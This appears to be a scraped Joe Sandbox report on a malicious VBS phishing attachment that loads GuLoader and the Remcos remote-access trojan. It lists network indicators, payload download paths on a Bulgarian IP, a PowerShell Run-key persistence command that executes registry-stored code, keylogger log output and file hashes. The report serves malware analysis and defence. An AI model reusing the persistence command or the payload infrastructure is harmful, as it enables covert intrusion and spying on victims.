                                                                    http://ocsp.ncdc.gov.sa0wscript.exe, 00000000.00000003.1623154388.000001ABE8863000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    http://fedir.comsign.co.il/crl/ComSignCA.crl0wscript.exe, 00000000.00000003.1623335324.000001ABE881E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    http://acraiz.icpbrasil.gov.br/LCRacraizv5.crl0wscript.exe, 00000000.00000003.1623065876.000001ABE8887000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    http://crl2.postsignum.cz/crl/psrootqca4.crl01wscript.exe, 00000000.00000003.1623206875.000001ABE884B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    http://trustcenter-crl.certificat2.com/Keynectis/KEYNECTIS_ROOT_CA.crl0wscript.exe, 00000000.00000003.1623206875.000001ABE884B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    http://web.ncdc.gov.sa/crl/nrcaparta1.crlwscript.exe, 00000000.00000003.1623154388.000001ABE8863000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    http://www.datev.de/zertifikat-policy-int0wscript.exe, 00000000.00000003.1623065876.000001ABE8887000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1623206875.000001ABE884B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      high
                                                                      • No. of IPs < 25%
                                                                      • 25% < No. of IPs < 50%
                                                                      • 50% < No. of IPs < 75%
                                                                      • 75% < No. of IPs
                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                      87.121.105.184
                                                                      unknownBulgaria
                                                                      43561NET1-ASBGfalse
                                                                      178.237.33.50
                                                                      geoplugin.netNetherlands
                                                                      8455ATOM86-ASATOM86NLfalse
                                                                      146.70.57.34
                                                                      paygateme.netUnited Kingdom
                                                                      2018TENET-1ZAfalse
                                                                      Joe Sandbox version:40.0.0 Tourmaline
                                                                      Analysis ID:1435459
                                                                      Start date and time:2024-05-02 18:38:04 +02:00
                                                                      Joe Sandbox product:CloudBasic
                                                                      Overall analysis duration:0h 7m 34s
                                                                      Hypervisor based Inspection enabled:false
                                                                      Report type:full
                                                                      Cookbook file name:default.jbs
                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                      Number of analysed new started processes analysed:17
                                                                      Number of new started drivers analysed:0
                                                                      Number of existing processes analysed:0
                                                                      Number of existing drivers analysed:0
                                                                      Number of injected processes analysed:0
                                                                      Technologies:
                                                                      • HCA enabled
                                                                      • EGA enabled
                                                                      • AMSI enabled
                                                                      Analysis Mode:default
                                                                      Analysis stop reason:Timeout
                                                                      Sample name:REVISED NEW ORDER 7936-2024.vbs
                                                                      Detection:MAL
                                                                      Classification:mal100.rans.phis.troj.spyw.expl.evad.winVBS@23/222@2/3
                                                                      EGA Information:
                                                                      • Successful, ratio: 60%
                                                                      HCA Information:
                                                                      • Successful, ratio: 94%
                                                                      • Number of executed functions: 190
                                                                      • Number of non-executed functions: 271
                                                                      Cookbook Comments:
                                                                      • Found application associated with file extension: .vbs
                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                      • Excluded IPs from analysis (whitelisted): 199.232.214.172
                                                                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, wu-bg-shim.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                                                                      • Execution Graph export aborted for target powershell.exe, PID 2912 because it is empty
                                                                      • Execution Graph export aborted for target powershell.exe, PID 6868 because it is empty
                                                                      • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                      • Report size getting too big, too many NtCreateKey calls found.
                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                      • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                      TimeTypeDescription
                                                                      17:39:55AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Nuchale %Piptadenia% -w 1 $Negerens127=(Get-ItemProperty -Path 'HKCU:\Sortiment\').Anadems;%Piptadenia% ($Negerens127)
                                                                      17:40:04AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Nuchale %Piptadenia% -w 1 $Negerens127=(Get-ItemProperty -Path 'HKCU:\Sortiment\').Anadems;%Piptadenia% ($Negerens127)
                                                                      18:38:51API Interceptor1x Sleep call for process: wscript.exe modified
                                                                      18:39:04API Interceptor61x Sleep call for process: powershell.exe modified
                                                                      18:40:00API Interceptor272x Sleep call for process: wab.exe modified
                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      87.121.105.184AWBSHIPPING-DHL-46T6R9764987.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                      • 87.121.105.184/AZhfsRGNnMsDgAhiUWb214.bin
                                                                      AWB DOCUMENT.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                      • 87.121.105.184/GTFcpD82.bin
                                                                      RFQ.NO. S70-23Q-1474-CS-P.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                      • 87.121.105.184/JTcKQkcYvvHPBH210.bin
                                                                      awb_shipping_documents_17_04_2024_00000.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                      • 87.121.105.184/yheFuLEFhskyHXyKesmPV163.bin
                                                                      RFQ NO S70-23Q-1474-CS-P.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                      • 87.121.105.184/yheFuLEFhskyHXyKesmPV163.bin
                                                                      178.237.33.50INQUIRY#46789.xla.xlsxGet hashmaliciousRemcosBrowse
                                                                      • geoplugin.net/json.gp
                                                                      Teklif talebi BAKVENTA-BAKUUsurpationens.cmdGet hashmaliciousGuLoader, RemcosBrowse
                                                                      • geoplugin.net/json.gp
                                                                      GVV.exeGet hashmaliciousRemcosBrowse
                                                                      • geoplugin.net/json.gp
                                                                      INQUIRY#46789-APRIL24_MAT_PRODUC_SAMPLE_PRODUCT.exeGet hashmaliciousRemcosBrowse
                                                                      • geoplugin.net/json.gp
                                                                      Evgh. rvs Armenia. 30.04.2024.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                      • geoplugin.net/json.gp
                                                                      202404294766578200.xlam.xlsxGet hashmaliciousRemcosBrowse
                                                                      • geoplugin.net/json.gp
                                                                      PLOCMR-002 Dane dotycz#U0105ce dokument#U00f3w i towar#U00f3w.htaGet hashmaliciousGuLoader, RemcosBrowse
                                                                      • geoplugin.net/json.gp
                                                                      nU7Z8sPyvf.rtfGet hashmaliciousRemcosBrowse
                                                                      • geoplugin.net/json.gp
                                                                      Tapril-30-receipt.vbsGet hashmaliciousRemcosBrowse
                                                                      • geoplugin.net/json.gp
                                                                      Tapril-30-receipt.vbsGet hashmaliciousRemcosBrowse
                                                                      • geoplugin.net/json.gp
                                                                      146.70.57.34RFQ.NO. S70-23Q-1474-CS-P.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                        RFQ NO- S70-23Q-147400000789975DXT-CS-P-0730RDER.bat.exeGet hashmaliciousRemcosBrowse
                                                                          Payment Invoice.exeGet hashmaliciousRemcosBrowse
                                                                            RFQ.NO. S70-23Q-1474-CS-P - ORDER 2024.gz.exeGet hashmaliciousRemcosBrowse
                                                                              NEW ORDER RFQ ICPO TECNOMAT-JEAL-EN590-200KMT-RTDM+TSA.bat.exeGet hashmaliciousRemcos, PureLog StealerBrowse
                                                                                ORDER RFQ ICPO TECNOMAT-JEAL-EN590-200KMT-RTDM+TSA.exeGet hashmaliciousRemcos, PureLog StealerBrowse
                                                                                  SecuriteInfo.com.Win32.PWSX-gen.19953.22926.exeGet hashmaliciousRemcosBrowse
                                                                                    SecuriteInfo.com.Win32.PWSX-gen.22684.1131.exeGet hashmaliciousRemcosBrowse
                                                                                      SecuriteInfo.com.Win32.PWSX-gen.20579.4557.exeGet hashmaliciousRemcos, PureLog StealerBrowse
                                                                                        PO 803707375.exeGet hashmaliciousRemcos, PureLog StealerBrowse
                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                          paygateme.netRFQ.NO. S70-23Q-1474-CS-P.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                          • 146.70.57.34
                                                                                          RFQ NO- S70-23Q-147400000789975DXT-CS-P-0730RDER.bat.exeGet hashmaliciousRemcosBrowse
                                                                                          • 146.70.57.34
                                                                                          RFQ.NO. S70-23Q-1474-CS-P - ORDER 2024.gz.exeGet hashmaliciousRemcosBrowse
                                                                                          • 146.70.57.34
                                                                                          NEW ORDER RFQ ICPO TECNOMAT-JEAL-EN590-200KMT-RTDM+TSA.bat.exeGet hashmaliciousRemcos, PureLog StealerBrowse
                                                                                          • 146.70.57.34
                                                                                          ORDER RFQ ICPO TECNOMAT-JEAL-EN590-200KMT-RTDM+TSA.exeGet hashmaliciousRemcos, PureLog StealerBrowse
                                                                                          • 146.70.57.34
                                                                                          SecuriteInfo.com.Win32.PWSX-gen.19953.22926.exeGet hashmaliciousRemcosBrowse
                                                                                          • 146.70.57.34
                                                                                          SecuriteInfo.com.Win32.PWSX-gen.22684.1131.exeGet hashmaliciousRemcosBrowse
                                                                                          • 146.70.57.34
                                                                                          SecuriteInfo.com.Win32.PWSX-gen.20579.4557.exeGet hashmaliciousRemcos, PureLog StealerBrowse
                                                                                          • 146.70.57.34
                                                                                          PO 803707375.exeGet hashmaliciousRemcos, PureLog StealerBrowse
                                                                                          • 146.70.57.34
                                                                                          PRODUCT LIST-CALAMARI9804870.exeGet hashmaliciousRemcosBrowse
                                                                                          • 146.70.57.34
                                                                                          geoplugin.netINQUIRY#46789.xla.xlsxGet hashmaliciousRemcosBrowse
                                                                                          • 178.237.33.50
                                                                                          Teklif talebi BAKVENTA-BAKUUsurpationens.cmdGet hashmaliciousGuLoader, RemcosBrowse
                                                                                          • 178.237.33.50
                                                                                          GVV.exeGet hashmaliciousRemcosBrowse
                                                                                          • 178.237.33.50
                                                                                          INQUIRY#46789-APRIL24_MAT_PRODUC_SAMPLE_PRODUCT.exeGet hashmaliciousRemcosBrowse
                                                                                          • 178.237.33.50
                                                                                          Evgh. rvs Armenia. 30.04.2024.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                                          • 178.237.33.50
                                                                                          202404294766578200.xlam.xlsxGet hashmaliciousRemcosBrowse
                                                                                          • 178.237.33.50
                                                                                          PLOCMR-002 Dane dotycz#U0105ce dokument#U00f3w i towar#U00f3w.htaGet hashmaliciousGuLoader, RemcosBrowse
                                                                                          • 178.237.33.50
                                                                                          nU7Z8sPyvf.rtfGet hashmaliciousRemcosBrowse
                                                                                          • 178.237.33.50
                                                                                          Tapril-30-receipt.vbsGet hashmaliciousRemcosBrowse
                                                                                          • 178.237.33.50
                                                                                          Tapril-30-receipt.vbsGet hashmaliciousRemcosBrowse
                                                                                          • 178.237.33.50
                                                                                          bg.microsoft.map.fastly.nethttps://netorgft1936705-my.sharepoint.com/personal/miskra_spark-bindercapital_com/_layouts/15/onedrive.aspx?id=/personal/miskra_spark-bindercapital_com/Documents/View%20and%20Print%20Online%20RMI.pdf&parent=/personal/miskra_spark-bindercapital_com/Documents&ga=1Get hashmaliciousUnknownBrowse
                                                                                          • 199.232.214.172
                                                                                          er).xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                          • 199.232.214.172
                                                                                          SAL_000268_DOM.xlsGet hashmaliciousUnknownBrowse
                                                                                          • 199.232.210.172
                                                                                          01105751.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                          • 199.232.214.172
                                                                                          5801.xlsGet hashmaliciousUnknownBrowse
                                                                                          • 199.232.210.172
                                                                                          DHL0000879654982647865424.vbsGet hashmaliciousUnknownBrowse
                                                                                          • 199.232.214.172
                                                                                          http://jimdo-storage.global.ssl.fastly.net/file/a45fef49-77a5-4e4b-b081-f19dd1b9626e/b0aa30c8-07ba-4acf-a6e6-856aaa7da320.pdfGet hashmaliciousUnknownBrowse
                                                                                          • 199.232.214.172
                                                                                          https://www.opustrustweb.com/EmailTrackerAPI/open?token=eyJhbGciOiJkaXIiLCJlbmMiOiJBMTI4Q0JDLUhTMjU2In0..62tVk07eUS1tgkfaDkQOqQ.nL-JZjGlYSBu9AibCOqK7-wJ7VXqjfoMrgeXwHgP6tLPx4s2jjofEWjZh794Ex5FiocFlK50_YxzembNjUsYkjIjaFyaIpNIDSPFE46cBlrxNy-t9VcCVcfKZphrojE0.AXzXZielor8D6px-r_wTOg&url=https://minicursodamariana.fun/nu/slceitil@emfa.ptGet hashmaliciousHTMLPhisherBrowse
                                                                                          • 199.232.214.172
                                                                                          http://collectionsystem.veconinter.com:8002/Default.aspx?Pais=TMVb4l9krDsyWtcOACvZcw==&Tipo=5vw2xkejLdEpXNK8ckiYpA==&Val=Ju61jJ3lX3gIjnPLX+eDdQ==&Id=3243049&VR=1Get hashmaliciousUnknownBrowse
                                                                                          • 199.232.214.172
                                                                                          https://flow.page/efraudprevention.comGet hashmaliciousHTMLPhisherBrowse
                                                                                          • 199.232.214.172
                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                          NET1-ASBGTeklif talebi BAKVENTA-BAKUUsurpationens.cmdGet hashmaliciousGuLoader, RemcosBrowse
                                                                                          • 87.121.105.163
                                                                                          01105751.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                          • 87.121.105.54
                                                                                          Aqua.x86-20240502-1008.elfGet hashmaliciousUnknownBrowse
                                                                                          • 94.156.79.215
                                                                                          Aqua.arm7-20240502-1008.elfGet hashmaliciousMiraiBrowse
                                                                                          • 94.156.79.215
                                                                                          yibSQnyAI7.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                          • 93.123.85.46
                                                                                          ryOgrdefvB.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                          • 93.123.85.46
                                                                                          kdTZ0vraR2.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                          • 93.123.85.46
                                                                                          jj5TL5MXzK.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                          • 93.123.85.46
                                                                                          file.exeGet hashmaliciousGuLoader, PXRECVOWEIWOEI StealerBrowse
                                                                                          • 94.156.79.214
                                                                                          PLOCMR-002 Dane dotycz#U0105ce dokument#U00f3w i towar#U00f3w.htaGet hashmaliciousGuLoader, RemcosBrowse
                                                                                          • 87.121.105.163
                                                                                          TENET-1ZAaduLTc2Dny.elfGet hashmaliciousMiraiBrowse
                                                                                          • 146.232.14.48
                                                                                          2cO52KdAG9.elfGet hashmaliciousMiraiBrowse
                                                                                          • 152.116.213.249
                                                                                          T-PO-1435 20240423 A398.com.exeGet hashmaliciousGuLoaderBrowse
                                                                                          • 146.70.113.163
                                                                                          ZMDO0vznFx.elfGet hashmaliciousUnknownBrowse
                                                                                          • 146.232.38.19
                                                                                          0tfJECfbEP.elfGet hashmaliciousMiraiBrowse
                                                                                          • 146.239.92.80
                                                                                          WwKYOW4jIg.elfGet hashmaliciousMiraiBrowse
                                                                                          • 146.69.137.17
                                                                                          oVOImRIAaz.elfGet hashmaliciousMiraiBrowse
                                                                                          • 146.239.92.56
                                                                                          BitTorrent-7.6.exeGet hashmaliciousUnknownBrowse
                                                                                          • 146.70.175.68
                                                                                          lS9yzwGRef.elfGet hashmaliciousMiraiBrowse
                                                                                          • 146.232.14.75
                                                                                          dugw41p62T.elfGet hashmaliciousMiraiBrowse
                                                                                          • 155.232.197.187
                                                                                          ATOM86-ASATOM86NLINQUIRY#46789.xla.xlsxGet hashmaliciousRemcosBrowse
                                                                                          • 178.237.33.50
                                                                                          Teklif talebi BAKVENTA-BAKUUsurpationens.cmdGet hashmaliciousGuLoader, RemcosBrowse
                                                                                          • 178.237.33.50
                                                                                          GVV.exeGet hashmaliciousRemcosBrowse
                                                                                          • 178.237.33.50
                                                                                          INQUIRY#46789-APRIL24_MAT_PRODUC_SAMPLE_PRODUCT.exeGet hashmaliciousRemcosBrowse
                                                                                          • 178.237.33.50
                                                                                          Evgh. rvs Armenia. 30.04.2024.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                                          • 178.237.33.50
                                                                                          202404294766578200.xlam.xlsxGet hashmaliciousRemcosBrowse
                                                                                          • 178.237.33.50
                                                                                          PLOCMR-002 Dane dotycz#U0105ce dokument#U00f3w i towar#U00f3w.htaGet hashmaliciousGuLoader, RemcosBrowse
                                                                                          • 178.237.33.50
                                                                                          https://acrobat.adobe.com/id/urn:aaid:sc:VA6C2:c2e8c3b1-63be-4a97-a3b9-a21649a6fcffGet hashmaliciousRemcosBrowse
                                                                                          • 178.237.33.50
                                                                                          nU7Z8sPyvf.rtfGet hashmaliciousRemcosBrowse
                                                                                          • 178.237.33.50
                                                                                          Tapril-30-receipt.vbsGet hashmaliciousRemcosBrowse
                                                                                          • 178.237.33.50
                                                                                          No context
                                                                                          No context
                                                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):358
                                                                                          Entropy (8bit):3.5388856850729664
                                                                                          Encrypted:false
                                                                                          SSDEEP:6:6lk2l55YcIeeDAlS1gWAAe5q1g+SkyGkNlw+SkSX81AEl4lFcUygWAv:6lXDecTWFe56UNvsvXtW+
                                                                                          MD5:DFEBF8695693DE58ED35AA1E6873E4FB
                                                                                          SHA1:511473CA63588B2DA1C1C6F15F93F864458EBA46
                                                                                          SHA-256:4BC9C773F5F2054F5CC08DB12F9427A476813EF5300BAECB937FC94943242FC5
                                                                                          SHA-512:0C2D433CA3C6A47694E35BF00AF3B1E66DBD7F91095F1802C1207615DFDF36B45D63EE6CC0DDA493DFF04762BE5D772DDC3C6606C8A0C38868AB16BDF26D6DA6
                                                                                          Malicious:true
                                                                                          Yara Hits:
                                                                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\remcos\logs.dat, Author: Joe Security
                                                                                          Preview:....[.2.0.2.4./.0.5./.0.2. .1.8.:.4.0.:.0.0. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.R.u.n.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....[.W.i.n.].r.....[.R.u.n.].........[.c.:.\.w.i.n.d.o.w.s.\.S.y.s.W.O.W.6.4.\.W.i.n.d.o.w.s.P.o.w.e.r.S.h.e.l.l.\.v.1...0.\.p.o.w.e.r.s.h.e.l.l...e.x.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....
                                                                                          Process:C:\Windows\System32\wscript.exe
                                                                                          File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 69993 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                                          Category:dropped
                                                                                          Size (bytes):69993
                                                                                          Entropy (8bit):7.99584879649948
                                                                                          Encrypted:true
                                                                                          SSDEEP:1536:iMveRG6BWC7T2g1wGUa5QUoaIB9ttiFJG+AOQOXl0Usvwr:feRG6BX6gUaHo9tkBHiUewr
                                                                                          MD5:29F65BA8E88C063813CC50A4EA544E93
                                                                                          SHA1:05A7040D5C127E68C25D81CC51271FFB8BEF3568
                                                                                          SHA-256:1ED81FA8DFB6999A9FEDC6E779138FFD99568992E22D300ACD181A6D2C8DE184
                                                                                          SHA-512:E29B2E92C496245BED3372578074407E8EF8882906CE10C35B3C8DEEBFEFE01B5FD7F3030ACAA693E175F4B7ACA6CD7D8D10AE1C731B09C5FA19035E005DE3AA
                                                                                          Malicious:true
                                                                                          Preview:MSCF....i.......,...................I.................oXAy .authroot.stl.Ez..Q6..CK..<Tk...p.k..1...3...[..%Y.f..."K.6)..[*I.hOB."..rK.RQ*..}f..f...}....9.|.....gA...30.,O2L...0..%.U...U.t.....`dqM2.x..t...<(uad.c...x5V.x..t..agd.v......i...KD..q(. ...JJ......#..'=. ...3.x...}...+T.K..!.'.`w .!.x.r.......YafhG..O.3....'P[..'.D../....n..t....R<..=\E7L0?{..T.f...ID...,...r....3z..O/.b.Iwx.. .o...a\.s........."..'.......<;s.[...l...6.)ll..B.P.....k.... k0.".t!/.,........{...P8....B..0(.. .Q.....d...q,\.$.n.Q.\.p...R..:.hr./..8.S<a.s...+#3....D..h1.a.0....{.9.....:e.......n.~G.{.M.1..OU.....B.Q..y_>.P{...}i.=.a..QQT.U..|!.pyCD@.....l..70..w..)...W^.`l...%Y.\................i..=hYV.O8W@P.=.r.=..1m..1....)\.p..|.c.3..t..[...).....l.{.Y....\S.....y....[.mCt....Js;...H....Q..F.....g.O...[..A.=...F[..z....k...mo.lW{`....O...T.g.Y.Uh.;m.'.N..f..}4..9i..t4p_bI..`.....Ie..l.P.... ...Lg......[....5g...~D.s.h'>n.m.c.7...-..P.gG...i$...v.m.b[.yO.P/*.YH.
                                                                                          Process:C:\Windows\System32\wscript.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):330
                                                                                          Entropy (8bit):3.2239959381311523
                                                                                          Encrypted:false
                                                                                          SSDEEP:6:kKYkXlEN+SkQlPlEGYRMY9z+4KlDA3RUeVlWI/Vt:wkXlbkPlE99SNxAhUeVLVt
                                                                                          MD5:64B5F5F56B82D9F8EA0BD4513CF82EE1
                                                                                          SHA1:2A53F2E3EF9F1B023BD2118CADA122CD4A4193C7
                                                                                          SHA-256:C6D423657DAC379A20E9657869A693E10C2B9337B6E5A59D23266DB3D1C3E0B8
                                                                                          SHA-512:1B5DD03DB9CCEE6CA1504141FB936CC82CA416CA7B1E45DCDF09E0AC4CF567952708BF7B9FE7B9737B07F0E46C4CE2FEB94AFFBAD75FB0D97884D0BF2F6E565B
                                                                                          Malicious:false
                                                                                          Preview:p...... .........1.6....(....................................................... ........M.........(.....wl....i...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".b.3.6.8.5.3.8.5.a.4.7.f.d.a.1.:.0."...
                                                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                          File Type:JSON data
                                                                                          Category:dropped
                                                                                          Size (bytes):965
                                                                                          Entropy (8bit):5.023840386167536
                                                                                          Encrypted:false
                                                                                          SSDEEP:12:tkhXkmnd6CsGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkk:qhXldRNuKyGX85jvXhNlT3/7AcV9Wro
                                                                                          MD5:35B07141970464FE1515126EE76D86C8
                                                                                          SHA1:BF560D7B92845B6DE04C7716CE1B62E4637E62E5
                                                                                          SHA-256:B2A7CD5C3E618A0ADFAA1B65E49A88B29060CA7C165DB516C5B32D376A12D4E0
                                                                                          SHA-512:D79DA10444FA33DDD7CE1DC12649D16E3E50C8E7E956487A62D9BAFC887F0C1B6B3761AE0E01ED5F72D86E078AD3897DC97A99F625E8FECA60F683D720C9BCD0
                                                                                          Malicious:false
                                                                                          Preview:{. "geoplugin_request":"191.96.150.225",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:data
                                                                                          Category:modified
                                                                                          Size (bytes):11608
                                                                                          Entropy (8bit):4.886255615007755
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:Pxoe5lpOdxoe56ib49Vsm5emdiVFn3eGOVpN6K3bkkjo5agkjDt4iWN3yBGHB9sT:lVib49+VoGIpN6KQkj2xkjh4iUx4cYK6
                                                                                          MD5:C7F7A26360E678A83AFAB85054B538EA
                                                                                          SHA1:B9C885922370EE7573E7C8CF0DDB8D97B7F6F022
                                                                                          SHA-256:C3D527BCA7A1D1A398F5BE0C70237BD69281601DFD7D1ED6D389B2FD8E3BC713
                                                                                          SHA-512:9F2F9DA5F4BF202A08BADCD4EF9CE159269EF47B657C6F67DC3C9FDB4EE0005CE5D0A9B4218DB383BAD53222B728B77B591CB5F41781AB30EF145CC7DB7D4F77
                                                                                          Malicious:false
                                                                                          Preview:PSMODULECACHE......e..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.............z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):64
                                                                                          Entropy (8bit):1.1940658735648508
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:NlllulJnp/p:NllU
                                                                                          MD5:BC6DB77EB243BF62DC31267706650173
                                                                                          SHA1:9E42FEFC2E92DE0DB2A2C9911C866320E41B30FF
                                                                                          SHA-256:5B000939E436B6D314E3262887D8DB6E489A0DDF1E10E5D3D80F55AA25C9FC27
                                                                                          SHA-512:91DC4935874ECA2A4C8DE303D83081FE945C590208BB844324D1E0C88068495E30AAE2321B3BA8A762BA08DAAEB75D9931522A47C5317766C27E6CE7D04BEEA9
                                                                                          Malicious:false
                                                                                          Preview:@...e.................................X..............@..........
                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
